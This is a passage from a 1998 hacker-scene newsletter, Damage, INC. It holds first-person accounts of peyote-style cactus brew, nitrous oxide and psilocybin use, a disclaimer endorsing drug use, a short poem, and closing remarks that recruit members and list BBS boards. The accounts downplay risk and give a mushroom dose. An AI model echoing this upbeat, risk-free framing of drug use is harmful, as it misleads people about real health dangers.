||
Mexican culture for many years, and knew a lot about the ancient
|
||
rituals involving the sacred cactus. The cactus was mashed up and
|
||
mixed into a brew with many other natural plants, which help smooth
|
||
the trip, and lessen negative somatic effects. It was the perfect
|
||
set and setting for the trip. I sat around the fire and discussed
|
||
anthropology with my acquaintances. The stars danced in the clear
|
||
night sky. It was a very pleasurable experience, except for the mild
|
||
nausea I felt while digesting the mixture."
|
||
|
||
9. NITROUS OXIDE
|
||
Names: Nitrous oxide, laughing gas, n2o, whippets.
|
||
"Nitrous is for kicks. It totally knocks you in the ass if you take
|
||
some while peaking out on another drug. Sometimes people will sell
|
||
in balloons, but most of the time you either use whipped cream
|
||
canisters, or buy it in a tank. Its more of a kid's drug, but it's
|
||
fun every now and then... if you want to have a 2-minute high."
|
||
|
||
10. PSILOCYBIN
|
||
Names: Psilocybin, mushrooms, shrooms, mushies.
|
||
"I've done shrooms quite a few times, and one thing I can say is that
|
||
the effects were always different. At first I used to get major
|
||
aural distortions and hallucinations, combined with spontaneous
|
||
laughing. Other times I'd be really happy, and body-buzzed. But the
|
||
most incredible experience I ever had was on three and a half grams of
|
||
the dried mushroom. While peaking my friend and I attained the
|
||
level of consciousness that is usually reserved only for meditating
|
||
buddhas. I felt very calm, and at one with the universe."
|
||
|
||
The above events are real accounts from various people, and they reflect their
|
||
own personal drug experiences and not necessarily those of The Journalist. It
|
||
is your choice whether or not you want to experiment with drugs. Even though
|
||
Damage, INC. condones and advocates their usage, we are not responsible for
|
||
*your* actions. If you choose to try any of the drugs mentioned, then that
|
||
decision is your own to make. Our intention isn't to influence our readers,
|
||
only to inform and educate them. We're not telling you to do drugs, nor are
|
||
we condemning them. We are simply sharing some unique experiences with you.
|
||
In order to make an informed decision, you require information on the topic.
|
||
That's exactly what we are providing you with. Read it, digest it and think
|
||
about it.
|
||
|
||
Written by The Journalist ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
THOUGHTS, POEMS AND CREATIVE WRITING - {WRITING}
|
||
Weakness and Strength:
|
||
|
||
Rumours, Misinformation, Assumptions, Fiction, Stories, Misconceptions,
|
||
Stereotypes, Falsehoods, Hearsay, Myths, Legends, Propaganda, Exaggeration,
|
||
Wrongs, Naive, Gullible, Influenced, Followers, Witchhunts, Disinformation,
|
||
Ignorance, Unreal, Brainwashed, Fake, Weak, Stupid, Zombies...Government,
|
||
Big Brother, Lies.
|
||
|
||
Facts, Information, Informed, Confirmed, Non-Fictional, Proven, Correct,
|
||
Accurate, Precise, Enlightened, Evolved, Truths, Direct, Honest, Knowledge,
|
||
Freedom, Liberty, Real, Strong, Powerful, Wise, Revolutionaries...Anarchy,
|
||
Damage, INC., Truth.
|
||
|
||
Written by BLACKENED ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
CLOSING COMMENTS - {CLOSING}
|
||
Shatazar's Inaugural Closing Comments:
|
||
|
||
I have been given the honour of closing another quality issue of the
|
||
Damage, INC. Newsletter. As always, it is our intent to provide our readers
|
||
with interesting and useful information that the mass media will not. The
|
||
quote for this issue, "We keep you honest" is what we have been doing since
|
||
the beginning. ;-) We work hard to make sure that all the information we
|
||
present to you is accurate and truthful. As we have stated many times, it is up
|
||
to you to form your own opinions. By the way, thinking to yourself "I disagree"
|
||
or "I don't believe it" doesn't benefit anyone, including yourself. That is
|
||
because the truth is not revealed by such thoughts. They must be acted upon.
|
||
|
||
Do your own research and report your findings to us. That is why the REPORTS
|
||
FROM THE FRONT section of the Damage, INC. Newsletter exists. Also, while
|
||
searching for the truth, if you discover something of great interest send the
|
||
information to us. If it is quality, we'll be pleased to share it with the rest
|
||
of our loyal readers. That way everyone is thinking and striving to eliminate
|
||
the fog of misinformation that Big Brother and the mass media creates on a daily
|
||
basis.
|
||
|
||
We're always looking for Writers, Members and Distribution Sites. If you'd like
|
||
to apply to Damage, INC. and join a respected h/p group, then download a copy of
|
||
the Damage, INC. Application Generator. If you want any of our releases, they
|
||
are currently available (at no ratio) on the following boards:
|
||
|
||
...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only.
|
||
Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t.
|
||
Distraught Continuum - h/p/a/c/v/t, programming, etc.
|
||
|
||
Any feedback or letters to the editor should be sent to BLACKENED in Email on
|
||
a Damage, INC. board near you. He can also be contacted via Echomail/Netmail
|
||
in several nets.
|
||
|
||
- EOF
|